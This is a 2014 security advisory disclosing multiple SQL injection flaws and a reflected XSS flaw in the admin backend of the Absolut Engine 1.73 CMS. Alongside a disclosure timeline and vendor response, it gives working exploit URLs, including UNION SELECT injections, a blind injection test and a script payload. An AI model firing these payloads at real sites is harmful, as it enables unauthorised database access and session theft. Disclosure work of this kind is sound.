Absolut Engine 1.73 - Multiple Vulnerabilities

[Aerosol]

Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS

Advisory ID: SROEADV-2014-08

Author: Steffen Rösemann

Affected Software: CMS Absolut Engine v. 1.73

Vendor URL: http://www.absolutengine.com/

Vendor Status: solved

CVE-ID: -


 ==========================

Vulnerability Description:

==========================


 The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL
injection vulnerabilities and a XSS vulnerability in its administrative
backend.


 ==================

Technical Details:

==================


 The following PHP-Scripts are prone to SQL injections:


 *managersection.php (via sectionID parameter)



*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1*


 *Exploit Example:*



*http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+*


 *edituser.php (via userID parameter)



*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3*


 *Exploit Example:*



*http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+*



 *admin.php (via username parameter, BlindSQLInjection)



*http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*


 *Exploit Example:*



*http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7*


 *managerrelated.php (via title parameter)


 *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title
<http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}*


 *Exploit Example:*



*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+*


 The last PHP-Script is as well vulnerable to a Reflecting XSS
vulnerability.


 *Exploit Example:*



*http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E*


 Although this is a product which is not actively developed anymore, I
think it is worth mentioning as the idea (of the lists) are to keep
tracking (unknown) vulnerabilities in software products (but that is a
personally point of view).


 Moreover, this product is still in use by some sites (!) and it is offered
without a hint of its status.


 =========

Solution:

=========


 As the CMS is not actively developed, it shouldn't be used anymore.


 ====================

Disclosure Timeline:

====================

29-Dec-2014 – found the vulnerability

29-Dec-2014 - informed the developers

29-Dec-2014 – release date of this security advisory [without technical
details]

30-Dec-2014 – Vendor responded, won't patch vulnerabilities

30-Dec-2014 – release date of this security advisory

30-Dec-2014 – post on FullDisclosure



 ========

Credits:

========


 Vulnerability found and advisory written by Steffen Rösemann.


 ===========

References:

===========


 http://www.absolutengine.com/

http://sroesemann.blogspot.de

Source